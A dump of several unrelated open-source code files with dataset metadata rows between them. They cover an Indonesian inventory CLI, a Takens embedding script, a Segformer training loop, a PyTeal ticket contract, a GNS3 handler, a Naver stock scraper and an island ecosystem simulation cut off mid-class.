delete_gadget(id_item_yang_akan_dihapus,gadget)
elif id_item_yang_akan_dihapus[0]=='C':
delete_consumable(id_item_yang_akan_dihapus,consumable)
else:
print("ID tidak cocok")
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F07 - Mengubah jumlah pada inventory
if pilihan == "ubahjumlah":
if curret_role=='admin':
id_item_yang_akan_diubah = input("Masukan ID: ")
if id_item_yang_akan_diubah[0]=='G':
ubah_jumlah_gadget(id_item_yang_akan_diubah, gadget)
elif id_item_yang_akan_diubah[0]=='C':
ubah_jumlah_consumable(id_item_yang_akan_diubah, consumable)
else:
print("Tidak ada item dengan ID tersebut!")
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F08 - Meminjam Gadget
if pilihan=='pinjam':
if curret_role=='user':
add_data_gadget_borrow_history(curret_id,gadget,gadget_borrow_history)
else:
print("Fungsi Hanya diperbolehkan untuk User")
#F09 - Mengembalikan Gadget
if pilihan=='kembalikan':
if curret_role=='user':
add_data_gadget_return_history(curret_id,gadget,gadget_borrow_history,gadget_return_history)
else:
print("Fungsi Hanya diperbolehkan untuk User")
#F10 - Meminta Consumable
if pilihan=='minta':
if curret_role=='user':
add_data_consumable_history(curret_id,consumable,consumable_history)
else:
print("Fungsi Hanya diperbolehkan untuk user")
#F11 - Melihat Riwayat Peminjaman Gadget
if pilihan=='riwayatpinjam':
if curret_role=='admin':
see_gadget_borrow_history(user,gadget,gadget_borrow_history)
#F12 - Melihat Riwayat Pengembalian Gadget
if pilihan=='riwayatkembali':
if curret_role=='admin':
see_gadget_return_history(user,gadget,gadget_return_history)
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F13 - Melihat Riwayat Pengambilan Consumable
if pilihan=='riwayatambil':
if curret_role=='admin':
see_consumable_history(user,consumable,consumable_history)
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F14 - Load Data
#Sudah pada baigan awal bersama dengan argparse
#F15 - Save Data
if pilihan=='save':
os.system("cls")
path=input("Masukkan Folder tempat file akan di save: ")
save(path,user,gadget,consumable,consumable_history,gadget_borrow_history,gadget_return_history)
r=50
for i in range (r):
progressBar(i, r)
time.sleep(.02)
time.sleep(1.5)
data=load(path)
loaded,user,gadget,consumable,consumable_history,gadget_borrow_history,gadget_return_history=data
#F16 - Help
if pilihan == 'help':
print("================================= HELP =================================")
print("register - untuk melakukan registrasi user baru")
print("login - untuk melakukan login ke dalam sistem")
print("carirarity - untuk mencari gadget dengan rarity tertentu")
print("caritahun - untuk mencari gadget berdasarkan tahun ditemukan")
if curret_role=='admin':
print("tambahitem - untuk menambahkan item ke dalam inventori")
print("hapusitem - untuk menghapus suatu item pada database")
print("ubahjumlah - untuk mengubah jumlah gadget dan consumable dalam sistem")
print("riwayatkembali - untuk melihat riwayat pengembalian gadget")
print("riwayatambil - untuk melihat riwayat pengambilan consumable")
else:#curret_role=='user'
print("pinjam - untuk melakukan peminjaman gadget")
print("kembalikan - untuk mengembalikan gadget")
print("minta - untuk meminta consumable yang tersedia")
print("save - untuk melakukan penyimpanan data")
print("help - untuk panduan penggunaan penggunaan sistem")
print("exit - untuk keluar dari aplikasi")
#F17 - Exit
if pilihan == 'exit':
pil = input("Apakah anda mau melakukan penyimpanan file yang sudah diubah? (y/n)")
if pil == "y" or pil == "Y":
path = input("Masukkan Folder tempat file akan di save: ")
save(path, user, gadget, consumable, consumable_history, gadget_borrow_history, gadget_return_history)
break
#FB01 - Hashing
#Done pada hashing.py
#FB02 - Mengembalikan Gadget Secara Parsial
#Done
#FB03 - Gacha
if pilihan=='gacha':
#Validasi User
#Sementara id digenerate otomatis. Nantinya current id
id=1
gacha(id,consumable,consumable_history) | bryanbernigen/TubesSem2 | main.py | main.py | py | 8,850 | python | id | code | 0 | github-code | 36 |
8490770607 | #%%
import numpy as np
import pandas as pd
from sklearn import metrics
from matplotlib import pyplot as plt
import glob
#%%
class Takens:
'''
constant
'''
tau_max = 30
'''
initializer
'''
def __init__(self, data,tau=None):
self.data = data
if tau is None:
self.tau, self.nmi = self.__search_tau()
else:
self.tau = tau
'''
reconstruct data by using searched tau
'''
def reconstruct(self):
_data1 = self.data[:-2]
_data2 = np.roll(self.data, -1 * self.tau)[:-2]
_data3 = np.roll(self.data, -2 * self.tau)[:-2]
return np.array([_data1, _data2, _data3])
'''
find tau to use Takens' Embedding Theorem
'''
def __search_tau(self):
# Create a discrete signal from the continunous dynamics
hist, bin_edges = np.histogram(self.data, bins=200, density=True)
bin_indices = np.digitize(self.data, bin_edges)
data_discrete = self.data[bin_indices]
# find usable time delay via mutual information
before = 1
nmi = []
res = None
for tau in range(1, self.tau_max):
unlagged = data_discrete[:-tau]
lagged = np.roll(data_discrete, -tau)[:-tau]
nmi.append(metrics.normalized_mutual_info_score(unlagged, lagged))
if res is None and len(nmi) > 1 and nmi[-2] < nmi[-1]:
res = tau - 1
if res is None:
res = 50
return res, nmi
class Dataset:
def __init__(self,dir_list):
self.root_path_list = dir_list
for dir in self.root_path_list:
path_list = glob.glob(os.path.join(dir, "*.csv"), recursive=True)
if len(path_list)==0:
print(f"Cannot find any files inside {dir}")
self.exp_path_list.extend(path_list)
# self.exp_path_list = [p.replace('./', '') for p in self.exp_path_list if 'old' not in p]
# print(self.exp_path_list)
for path in self.exp_path_list:
df = pd.read_csv(path)
self.eigenworm_exp_list.append(np.array(df.loc[:,self.var_name]))
[self.behavior_label_dict[k].append(df.loc[:,k].values) for k in self.behavior_label_name]
self.stimulus_list.append(np.array(df.loc[:,'led']))
#%%
import itertools
import os
var_name = ['a_1','a_2','a_3','a_4','a_5','VelocityTailToHead']
root_path_list = ['data/141_ASH_02/']
exp_path_list = []
for dir in root_path_list:
path_list = glob.glob(os.path.join(dir, "*.csv"), recursive=True)
if len(path_list)==0:
print(f"Cannot find any files inside {dir}")
exp_path_list.extend(path_list)
dataset = {}
for i, name in enumerate(var_name):
eigenworm_exp_list = []
d = []
for path in exp_path_list:
df = pd.read_csv(path)
d.append(np.array(df.loc[:,name]))
d_1D = list(itertools.chain.from_iterable(d))
dataset[name] = d_1D
#%%
# eigenworm_exp_list = np.array(eigenworm_exp_list)
#
fig, axs = plt.subplots(6,2, figsize=(15,30))
plt_sample_size = 30000
for i, name in enumerate(var_name):
takens = Takens(dataset[name],tau=10)
emd = takens.reconstruct()
tau = takens.tau
axs[i,0].scatter(emd[0,:plt_sample_size],emd[1,:plt_sample_size],s=1,c=dataset["VelocityTailToHead"][:plt_sample_size])
axs[i,1].plot(emd[0,:10000],emd[1,:10000],lw=0.2)
axs[i,0].set_title(name+'\n'+'tau:'+str(tau))
axs[i,1].set_title(name+'\n'+'tau:'+str(tau))
plt.show()
#%%
fig.savefig("tde.png",dpi=150)
#%%
position = np.array(df.loc[:,["posCentroidX","posCentroidY"]])
velocity = np.array(df.loc[:,["VelocityTailToHead"]])
#%%
# plt.plot(emd[0,:1000],emd[1,:1000],'gray',lw=0.1)
plt.scatter(emd[0,:60000],emd[2,:60000],s=1,c=dataset["VelocityTailToHead"][:60000])
plt.savefig('tde_velocity_all.png',dpi=150)
#%%
| kei-mo/BehavCrassificationElegans_TDE | tde.py | tde.py | py | 3,519 | python | en | code | 0 | github-code | 36 |
73485605863 | import argparse
import os
import uuid
import numpy as np
import torch
from torch import optim
from torch.nn import functional
from torch.utils.data import DataLoader
from datasets import load_metric
import albumentations
from albumentations.pytorch import ToTensorV2
from tqdm import tqdm
from utils import set_seed, load_config
from dataset import HarborClassificationDataset, HarborSegmentationDataset
from model import TwinHeadSegformerForSemanticSegmentation
parser = argparse.ArgumentParser(description="Train twin head segformer")
parser.add_argument("--seed", type=int, default=None)
parser.add_argument("--id", type=str, default=None)
parser.add_argument("--num_epochs", type=int, default=None)
args = parser.parse_args()
if args.seed is not None:
set_seed(args.seed)
train_id = args.id
if train_id is None:
train_id = uuid.uuid4().hex
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
config = load_config(os.path.join(os.path.dirname(__file__), "config.yaml"))
train_config = config["train"]["twin_head"]
model_name = config["pretrained_model_name"]
label2id = {k: v + 1 for k, v in config["label2id"].items()}
label2id["background"] = 0
id2label = {v: k for k, v in label2id.items()}
transform = albumentations.Compose([
albumentations.CoarseDropout(
max_holes=16, max_height=0.1, max_width=0.1, min_height=0.05, min_width=0.05, p=0.5
),
albumentations.HorizontalFlip(p=0.5),
albumentations.SafeRotate(15, p=0.5),
albumentations.GaussNoise(p=0.5),
albumentations.OpticalDistortion(p=0.5),
albumentations.OneOf([
albumentations.RGBShift(),
albumentations.RandomToneCurve(),
albumentations.InvertImg(),
albumentations.ToGray()
]),
ToTensorV2()
])
classifier_train_dataset = HarborClassificationDataset.from_config(config)
classifier_train_dataset.set_transform(transform)
train_dataset = HarborSegmentationDataset.from_config(config)
train_dataset.set_transform(transform)
classifier_train_dataloader = DataLoader(
classifier_train_dataset, batch_size=train_config["classifier_batch_size"], shuffle=True
)
train_dataloader = DataLoader(
train_dataset, batch_size=train_config["batch_size"], shuffle=True
)
model = TwinHeadSegformerForSemanticSegmentation.from_pretrained(
model_name,
num_labels=len(id2label),
id2label=id2label,
label2id=label2id,
ignore_mismatched_sizes=True
)
model.to(device)
optimizer = optim.AdamW(
model.parameters(),
lr=float(train_config["learning_rate"]),
weight_decay=float(train_config["weight_decay"])
)
accumulation_steps = train_config["accumulation_steps"]
losses = []
f1_metric = load_metric("f1")
miou_metric = load_metric("mean_iou")
model.train()
num_epochs = args.num_epochs
if num_epochs is None:
num_epochs = train_config["num_epochs"]
step = 0
for epoch in range(1, num_epochs + 1):
for (classifier_pixel_values, classifier_labels), segmenter_batch in tqdm(
zip(classifier_train_dataloader, train_dataloader),
train_id,
total=min(len(classifier_train_dataloader), len(train_dataloader))
):
step += 1
classifier_pixel_values = classifier_pixel_values.to(device)
classifier_labels = classifier_labels.to(device)
pixel_values = segmenter_batch["pixel_values"].to(device)
labels = segmenter_batch["labels"].to(device)
outputs = model(
classifier_pixel_values=classifier_pixel_values,
classifier_labels=classifier_labels,
pixel_values=pixel_values,
labels=labels
)
classifier_logits, logits = outputs.classifier_logits, outputs.logits
loss = (outputs.classifier_loss + outputs.loss) / 2
loss /= accumulation_steps
losses.append(loss.item())
loss.backward()
if step % accumulation_steps == 0:
optimizer.step()
optimizer.zero_grad()
f1_metric.add_batch(
predictions=classifier_logits.argmax(dim=-1).detach().cpu().numpy(),
references=classifier_labels.detach().cpu().numpy()
)
if epoch % train_config["eval_frequency"] == 0:
with torch.no_grad():
upsampled_logits = functional.interpolate(
logits,
size=labels.shape[-2:],
mode="bilinear",
align_corners=False
)
predicted = upsampled_logits.argmax(dim=1)
miou_metric.add_batch(
predictions=predicted.detach().cpu().numpy(),
references=labels.detach().cpu().numpy()
)
micro_f1 = f1_metric.compute(average="micro")["f1"]
if epoch % train_config["eval_frequency"]:
print(
f"epoch: {epoch}\n"
f"├─ loss: {np.mean(losses[-100:]):.6f}\n"
f"└─ micro f1: {micro_f1:.4f}\n"
)
else:
miou_metrics = miou_metric.compute(
num_labels=len(id2label), ignore_index=label2id["background"], reduce_labels=False
)
print(
f"epoch: {epoch}\n"
f"├─ loss: {np.mean(losses[-100:]):.6f}\n"
f"├─ micro f1: {micro_f1:.4f}\n"
f"├─ mIoU: {miou_metrics['mean_iou']:.4f}\n"
f"└─ mAcc: {miou_metrics['mean_accuracy']:.4f}\n"
)
torch.save(model, os.path.join(os.path.dirname(__file__), "checkpoints", f"{train_id}_{epoch}.pt"))
| lexiconium/2022_ai_online_competition-sementic_segmentation | train_twin_head_segformer.py | train_twin_head_segformer.py | py | 5,536 | python | en | code | 0 | github-code | 36 |
13143781971 | # A stream of data is received and needs to be reversed.
#
# Each segment is 8 bits long, meaning the order of these segments needs to be reversed, for example:
#
# 11111111 00000000 00001111 10101010
# (byte1) (byte2) (byte3) (byte4)
# should become:
#
# 10101010 00001111 00000000 11111111
# (byte4) (byte3) (byte2) (byte1)
# The total number of bits will always be a multiple of 8.
#
# The data is given in an array as such:
#
# [1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,0,1,0,1,0,1,0]
# Note: In the C and NASM languages you are given the third parameter which is the number of segment blocks.
def data_reverse(data):
out = []
sub = []
i = 0
for b in data:
sub.append(b)
i +=1
if i>7:
out.append(sub)
sub = []
i = 0
out.reverse()
return sum(out, [])
print(data_reverse([1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0]))
| michsanya/codewars | DataReverse.py | DataReverse.py | py | 989 | python | en | code | 0 | github-code | 36 |
11715375830 | from typing import Literal
import beaker as bk
from pyteal import (
Expr,
Global,
InnerTxnBuilder,
Int,
Seq,
Txn,
TxnField,
TxnType,
abi,
)
app = bk.Application("EventTicket")
@app.external
def create_asset(
assetName: abi.String,
assetUrl: abi.String,
assetTotal: abi.Uint64,
managerAddress: abi.Address,
metadataHash: abi.StaticBytes[Literal[32]],
) -> Expr:
return Seq( # Seq is used to group a set of operations with only the last returning a value on the stack
# Start to build the transaction builder
InnerTxnBuilder.Begin(),
# This method accepts a dictionary of TxnField to value so all fields may be set
InnerTxnBuilder.SetFields(
{
TxnField.type_enum: TxnType.AssetConfig,
TxnField.config_asset_name: assetName.get(),
TxnField.config_asset_url: assetUrl.get(),
TxnField.config_asset_manager: managerAddress.get(),
TxnField.config_asset_clawback: Global.current_application_address(),
TxnField.config_asset_reserve: Global.current_application_address(),
TxnField.config_asset_freeze: Global.current_application_address(),
TxnField.config_asset_total: assetTotal.get(),
TxnField.config_asset_metadata_hash: metadataHash.get(),
TxnField.config_asset_decimals: Int(0),
}
),
# Submit the transaction we just built
InnerTxnBuilder.Submit(),
)
@app.external
def get_asset(asset: abi.Asset) -> Expr:
return Seq( # Seq is used to group a set of operations with only the last returning a value on the stack
# Start to build the transaction builder
InnerTxnBuilder.Begin(),
# This method accepts a dictionary of TxnField to value so all fields may be set
InnerTxnBuilder.SetFields(
{
TxnField.type_enum: TxnType.AssetTransfer,
TxnField.xfer_asset: asset.asset_id(),
TxnField.asset_amount: Int(1),
TxnField.asset_receiver: Txn.sender(),
TxnField.asset_sender: Global.current_application_address(),
}
),
# Submit the transaction we just built
InnerTxnBuilder.Submit(),
)
if __name__ == "__main__":
spec = app.build()
spec.export("artifacts")
| freddyblockchain/AlgokitProject | smart_contracts/code/eventticket.py | eventticket.py | py | 2,429 | python | en | code | 0 | github-code | 36 |
34366485863 | from scripts.leet75.reverse_string import Solution
class Test:
test_cases = [
[["h", "e", "l", "l", "o"], ["o","l","l","e","h"]],
[["H","a","n","n","a","h"], ["h","a","n","n","a","H"]],
[["h"], ["h"]],
[[], []],
]
def test_reverse_string(self):
soln = Solution()
for case, expected in self.test_cases:
assert soln.reverseString(case) == expected
def test_reverse_string_recursive(self):
soln = Solution()
for case, expected in self.test_cases:
assert soln.reverseStringRecursive(case) == expected
if __name__ == '__main__':
soln = Solution()
inp1 = ["h", "e", "l", "l", "o"]
print(soln.reverseString(inp1)) | TrellixVulnTeam/learning_to_test_code_BL81 | tests/leet75/test_reverse_string.py | test_reverse_string.py | py | 740 | python | en | code | 0 | github-code | 36 |
19033561242 | """ Module which contains function determining possible configurations of a mission."""
def get_mission_components(data, root):
"""
Returns all possible combinations of components for a mission which is specified by its
root node (according to the constrained AND-OR tree). This is done by traversing the tree
until we reach the LEAFs - hosts of configuration.
:param data: json containing constrained AND-OR tree
:param root: id of root node for the mission
:return: configurations of the mission
"""
partial_result = [[root]]
complete_result = []
while partial_result:
vertex_list = partial_result.pop(0)
i = 0
original_length = len(vertex_list)
while i < len(vertex_list):
entity_id = vertex_list[i]
if services_contain_id(data['nodes']['services'], entity_id):
vertex_list.pop(i)
for edge in data['relationships']['one_way']:
if edge['from'] == entity_id:
vertex_list.append(edge['to'])
partial_result.append(vertex_list)
break
elif hosts_contain_id(data['nodes']['hosts'], entity_id):
i += 1
continue
elif entity_id in data['nodes']['aggregations']['and']:
vertex_list.pop(i)
for edge in data['relationships']['one_way']:
if edge['from'] == entity_id:
vertex_list.append(edge['to'])
partial_result.append(vertex_list)
break
elif entity_id in data['nodes']['aggregations']['or']:
vertex_list.pop(i)
edge_ends = []
for edge in data['relationships']['one_way']:
if edge['from'] == entity_id:
edge_ends.append(edge['to'])
for end in edge_ends:
partial_result.append(vertex_list + [end])
break
elif missions_contain_id(data['nodes']['missions'], entity_id):
vertex_list.pop(i)
for edge in data['relationships']['one_way']:
if edge['from'] == entity_id:
vertex_list.append(edge['to'])
partial_result.append(vertex_list)
break
if i == original_length:
# contains only hosts
complete_result.append(set(vertex_list))
return complete_result
def hosts_contain_id(hosts_data, host_id):
"""
True if host_id is id of a host.
:param hosts_data: list of hosts
:param host_id: id of a host
:return: True or False
"""
for host in hosts_data:
if host_id == host['id']:
return True
return False
def services_contain_id(services_data, service_id):
"""
Tests if service_id is id of service.
:param services_data: list of services
:param service_id: id of service
:return: True if service_id is service
"""
for service in services_data:
if service_id == service['id']:
return True
return False
def components_contain_id(components_data, component_id):
"""
Tests whether component_id is id of component.
:param components_data: list of components
:param component_id: id of component
:return: True if component_id is component
"""
for component in components_data:
if component_id == component['id']:
return True
return False
def missions_contain_id(missions_data, mission_id):
"""
Tests whether mission_id is id of mission.
:param missions_data: list of missions
:param mission_id: id of mission
:return: True if mission_id is mission
"""
for mission in missions_data:
if mission_id == mission['id']:
return True
return False
| CSIRT-MU/CRUSOE | crusoe_decide/crusoe_decide/components.py | components.py | py | 3,916 | python | en | code | 9 | github-code | 36 |
70477030183 | import os
import pandas as pd
from selenium import webdriver
from selenium.webdriver.common.by import By
from lxml import etree
browser = webdriver.Chrome()
browser.maximize_window() # 창 최대화
# 1. 페이지 이동
url = 'https://finance.naver.com/sise/sise_market_sum.naver?&page='
browser.get(url) # 해당 url로 페이지 이동
# 2. 조회 항목 초기화 (체크 되어 있는 항목 체크 해제)
checkboxes = browser.find_elements(By.NAME, 'fieldIds') # 해당 브라우저(네이버 주식)에 elements들을 찾는데 그 중에 name 속성이 fieldIds인 것들만 찾아 변수에 담아주기
for checkbox in checkboxes:
if checkbox.is_selected(): # 체크된 상태라면
checkbox.click() # 기존 클릭되어 있는걸 다시 클릭하여 클릭 해제 시킨다.
# 3. 조회 항목 설정 (원하는 항목)
items_to_select = ['영업이익', '자산총계', '매출액']
for checkbox in checkboxes:
parent = checkbox.find_element(By.XPATH, '..') # 부모 element를 찾는다. 즉, 여기선 <td> 태그를 찾는다
label = parent.find_element(By.TAG_NAME, 'label') # <td> 태그 안에 있는 label을 찾는다
# print(label.text) # 이름 확인
if label.text in items_to_select: # 선택 항목과 일치 한다면
checkbox.click() # 체크
# 4. 적용하기 버튼 클릭
btn_apply = browser.find_element(By.XPATH, '//a[@href="javascript:fieldSubmit()"]') # //은 html 전체 문서에서 찾겠다는 의미
btn_apply.click()
for idx in range(1, 40): # 1~40 미만 반복
# 4.5 사전작업 : 페이지 이동
browser.get(url + str(idx)) # e.g) https://finance/naver.com/~~~&=1~2...
# 5. 데이터 추출
df = pd.read_html(browser.page_source)[1]
# 데이터 결측치란? 데이터에 값이 없다는 것을 뜻 함. NaN, NA, 료ull
# axis='index' : row 기준으로 삭제,
# how='all' : row(줄) 전체가 데이터가 없다면 지움
# inplace=True : 데이터 반영
df.dropna(axis='index', how='all', inplace=True)
df.dropna(axis='columns', how='all', inplace=True)
if len(df) == 0: # 더 이상 가져올 데이터가 없으면?
break
# 6. 파일 저장 => import os
f_name = 'sise.csv'
if os.path.exists(f_name): # 파일이 있다면? 헤더 제외
df.to_csv(f_name, encoding='utf-8-sig', index=False, mode='a', header=False) # 헤더 제외하고 append 해서 데이터 넣기
else: # 파일이 없다면? 헤더 포함. 즉, 처음 파일 만들 때
df.to_csv(f_name, encoding='utf-8-sig', index=False)
print(f'{idx} 페이지 완료')
browser.quit() # 브라우저 종료 | thisiswoo/python_practice | naver_stock_crawling/market_cap.py | market_cap.py | py | 2,652 | python | ko | code | 0 | github-code | 36 |
24065321916 | import os
import psutil
import platform
from gns3server.web.route import Route
from gns3server.config import Config
from gns3server.schemas.version import VERSION_SCHEMA
from gns3server.compute.port_manager import PortManager
from gns3server.version import __version__
from aiohttp.web import HTTPConflict
class ServerHandler:
@Route.get(
r"/version",
description="Retrieve the server version number",
output=VERSION_SCHEMA)
def version(request, response):
config = Config.instance()
local_server = config.get_section_config("Server").getboolean("local", False)
response.json({"version": __version__, "local": local_server})
@Route.get(
r"/debug",
description="Return debug informations about the compute",
status_codes={
201: "Writed"
})
def debug(request, response):
response.content_type = "text/plain"
response.text = ServerHandler._getDebugData()
@staticmethod
def _getDebugData():
try:
addrs = ["* {}: {}".format(key, val) for key, val in psutil.net_if_addrs().items()]
except UnicodeDecodeError:
addrs = ["INVALID ADDR WITH UNICODE CHARACTERS"]
data = """Version: {version}
OS: {os}
Python: {python}
CPU: {cpu}
Memory: {memory}
Networks:
{addrs}
""".format(
version=__version__,
os=platform.platform(),
python=platform.python_version(),
memory=psutil.virtual_memory(),
cpu=psutil.cpu_times(),
addrs="\n".join(addrs)
)
try:
connections = psutil.net_connections()
# You need to be root for OSX
except psutil.AccessDenied:
connections = None
if connections:
data += "\n\nConnections:\n"
for port in PortManager.instance().tcp_ports:
found = False
for open_port in connections:
if open_port.laddr[1] == port:
found = True
data += "TCP {}: {}\n".format(port, found)
for port in PortManager.instance().udp_ports:
found = False
for open_port in connections:
if open_port.laddr[1] == port:
found = True
data += "UDP {}: {}\n".format(port, found)
return data
| vieyahn/docker-cisco-lab | gns3server/gns3server/handlers/api/compute/server_handler.py | server_handler.py | py | 2,414 | python | en | code | 0 | github-code | 36 |
74330584745 | # -*- coding: utf-8 -*-
__author__ = "Amir Arfan, Sebastian Becker"
__email__ = "amar@nmbu.no, sebabeck@nmbu.no"
"""
Simulation of the Island with visualization
"""
from .map import Map
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import subprocess
import random
import os
import textwrap
# External tool names and default output locations for movie generation.
# NOTE(review): the movie-making code is not in this chunk — presumably these
# are consumed by a make_movie() method elsewhere in the file; confirm usage.
_FFMPEG_BINARY = "ffmpeg"
_CONVERT_BINARY = "magick"
_DEFAULT_GRAPHICS_DIR = os.path.join("..", "data")
_DEFAULT_GRAPHICS_NAME = "dv"
_DEFAULT_MOVIE_FORMAT = "mp4"  # alternatives: mp4, gif
class BioSim:
    """
    Simulation of an island ecosystem with live matplotlib visualization.

    Wraps a :class:`Map` built from a multi-line landscape string, drives the
    yearly cycle, and draws a population graph plus per-species heat maps.
    """

    # RGB colour used to render each landscape letter on the island map
    # (legend order in _create_map: Ocean, Mountain, Jungle, Savannah, Desert).
    rgb_value = {
        "O": (0.0, 0.0, 1.0),
        "M": (0.5, 0.5, 0.5),
        "J": (0.0, 0.6, 0.0),
        "S": (0.5, 1.0, 0.5),
        "D": (1.0, 1.0, 0.5),
    }
def __init__(
self,
island_map,
ini_pop,
seed,
ymax_animals=None,
cmax_animals=None,
img_base=None,
img_fmt="png",
):
"""
:param island_map: Multi-line string specifying island geography
:param ini_pop: List of dictionaries specifying initial population
:param seed: Integer used as random number seed
:param ymax_animals: Number specifying y-axis limit for graph showing animal numbers
:param cmax_animals: Dict specifying color-code limits for animal densities
:param img_base: String with beginning of file name for figures, including path
:param img_fmt: String with file type for figures, e.g. 'png'
If ymax_animals is None, the y-axis limit should be adjusted automatically.
If cmax_animals is None, sensible, fixed default values should be used.
cmax_animals is a dict mapping species names to numbers, e.g.,
{'Herbivore': 50, 'Carnivore': 20}
If img_base is None, no figures are written to file.
Filenames are formed as
'{}_{:05d}.{}'.format(img_base, img_no, img_fmt)
where img_no are consecutive image numbers starting from 0.
img_base should contain a path and beginning of a file name.
"""
self._map = Map(island_map)
self.map_rgb = [
[self.rgb_value[column] for column in row]
for row in island_map.splitlines()
]
self._map.add_animals(ini_pop)
np.random.seed(seed)
random.seed(seed)
self._year = 0
self._final_year = None
self._num_animals = 0
self._num_animals_per_species = {}
self._animal_distribution = None
self.img_fmt = img_fmt
self.img_count = 0
self.img_base = img_base
self._island_map = None
self._fig = None
self._map_ax = None
self._mean_ax = None
self._herb_line = None
self._carn_line = None
self.herb_heat = None
self.carn_heat = None
self.herb_img_axis = None
self.carn_img_axis = None
self.year_counter_active = False
if ymax_animals is None:
self.ymax_animals = 20000
else:
self.ymax_animals = ymax_animals
if cmax_animals is not None:
self.cmax_animals = cmax_animals
else:
self.cmax_animals = {"Herbivore": 50, "Carnivore": 20}
    def set_animal_parameters(self, species, params):
        """
        Set parameters for animal species.

        Delegates to the Map instance, which applies the parameters in
        every cell of the island.

        :param species: String, name of animal species
                        (e.g. 'Herbivore' or 'Carnivore')
        :param params: Dict with valid parameter specification for species
        """
        self._map.update_animal_params_all_cells(species, params)
    def set_landscape_parameters(self, landscape, params):
        """
        Set parameters for landscape type.

        Delegates to the Map instance, which applies the parameters in
        every cell of the island.

        :param landscape: String, code letter for landscape
                          (one of 'O', 'M', 'J', 'S', 'D')
        :param params: Dict with valid parameter specification for landscape
        """
        self._map.update_param_all_cells(landscape, params)
def simulate(self, num_years, vis_years=1, img_years=None):
"""
Run simulation while visualizing the result.
:param num_years: number of years to simulate
:param vis_years: years between visualization updates
:param img_years: years between visualizations saved to files (default: vis_years)
Image files will be numbered consecutively.
"""
if img_years is None:
img_years = vis_years
self._final_year = self.year + num_years
self._setup_graphics()
while self._year < self._final_year:
if self._year % vis_years == 0:
self._update_graphics()
if self._year % img_years == 0:
self._save_graphics()
self._map.cycle()
self._year += 1
    def _setup_graphics(self):
        """
        Lazily create the figure, subplots, population lines and year counter.

        Safe to call repeatedly: each element is only created while its handle
        is still None, so a second :meth:`simulate` call reuses the existing
        window and merely extends the x-axis of the population graph.
        """
        if self._fig is None:
            self._fig = plt.figure(figsize=(10, 8))
        if self._island_map is None:
            self._create_map()
        if self._mean_ax is None:
            # Upper-right subplot: population counts over time.
            self._mean_ax = self._fig.add_subplot(2, 2, 2)
            self._mean_ax.set_title("Herbivore and Carnivore Population")
            self._mean_ax.set_ylim(0, self.ymax_animals)
        # Runs on every call: the x-limit must track the (new) final year.
        self._mean_ax.set_xlim(0, self._final_year + 1)
        self._create_herb_line()
        self._create_carn_line()
        self.year_format = "Year: {:5d}"
        if not self.year_counter_active:
            # Boxed year counter in the top-left corner of the figure.
            self.txt = self._fig.text(
                0.09,
                0.97,
                self.year_format.format(0),
                ha="center",
                va="center",
                bbox=dict(boxstyle="round", ec=(0, 0, 0), fc="none",),
            )
            self.year_counter_active = True
        if self.herb_heat is None:
            # Upper-left subplot: herbivore density heat map.
            self.herb_heat = self._fig.add_subplot(2, 2, 1)
            self.herb_heat.set_title("Herbivore Heat Map")
            self.herb_img_axis = None
        if self.carn_heat is None:
            # Lower-left subplot: carnivore density heat map.
            self.carn_heat = self._fig.add_subplot(2, 2, 3)
            self.carn_heat.set_title("Carnivore Heat Map")
            self.carn_img_axis = None
        self._fig.tight_layout()
def _update_graphics(self):
"""
Updates the plots with new data
"""
pop_df = self.animal_distribution
rows, cols = np.shape(self._map.map)
herb_count = pop_df.Herbivore
herb_array = np.array(herb_count).reshape(rows, cols)
carn_count = pop_df.Carnivore
carn_array = np.array(carn_count).reshape(rows, cols)
self._update_specie_lines()
self._update_herb_heatmap(herb_array)
self._update_carn_heatmap(carn_array)
self.txt.set_text(self.year_format.format(self.year))
plt.pause(1e-6)
def _save_graphics(self):
"""
Saves the plots as a specified file type.
"""
if self.img_base is None:
return
print(
"Saving to",
"{base}_{num:05d}.{type}".format(
base=self.img_base, num=self.img_count, type=self.img_fmt
),
)
plt.savefig(
"{base}_{num:05d}.{type}".format(
base=self.img_base, num=self.img_count, type=self.img_fmt
)
)
self.img_count += 1
    def _create_map(self):
        """
        Creates map plot out of RGB colors and map string.

        Draws the island RGB image with a landscape legend and 1-based
        row/column tick labels.
        """
        self._island_map = self._fig.add_subplot(2, 2, 4)
        self._island_map.set_title("Island Map")
        self._island_map.imshow(self.map_rgb)
        # NOTE(review): assumes self.rgb_value's key order matches this
        # label order (Ocean, Mountain, ...) — confirm where rgb_value is built.
        labels = ["Ocean", "Mountain", "Jungle", "Savannah", "Desert"]
        patches = [
            mpatches.Patch(color=self.rgb_value[i], label=labels[n])
            for n, i in enumerate(self.rgb_value.keys())
        ]
        self._island_map.legend(handles=patches, prop={"size": 5}, loc=4)
        # Ticks are labelled 1..N to match human-readable map coordinates.
        self._island_map.set_xticks(range(len(self.map_rgb[0])))
        self._island_map.set_xticklabels(
            labels=(range(1, 1 + len(self.map_rgb[0]))),
            fontdict={"fontsize": 6},
        )
        self._island_map.set_yticks(range(len(self.map_rgb)))
        self._island_map.set_yticklabels(
            labels=range(1, 1 + len(self.map_rgb)), fontdict={"fontsize": 6}
        )
    def _create_herb_line(self):
        """
        Creates population graph for Herbivores.

        On the first call a NaN-filled placeholder line spanning the whole
        run is created; on later calls (when simulate() is re-run with a
        larger final year) the existing line is padded with NaN up to the
        new final year so earlier data is preserved.
        """
        if self._herb_line is None:
            herb_plot = self._mean_ax.plot(
                np.arange(0, self._final_year),
                np.full(self._final_year, np.nan),
            )
            self._herb_line = herb_plot[0]
        else:
            xdata, ydata = self._herb_line.get_data()
            xnew = np.arange(xdata[-1] + 1, self._final_year)
            if len(xnew) > 0:
                ynew = np.full(xnew.shape, np.nan)
                self._herb_line.set_data(
                    np.hstack((xdata, xnew)), np.hstack((ydata, ynew))
                )
    def _create_carn_line(self):
        """
        Creates population graph for Carnivores.

        Mirrors the herbivore line: a NaN-filled placeholder on first call,
        NaN-padded extension on subsequent simulate() runs.
        """
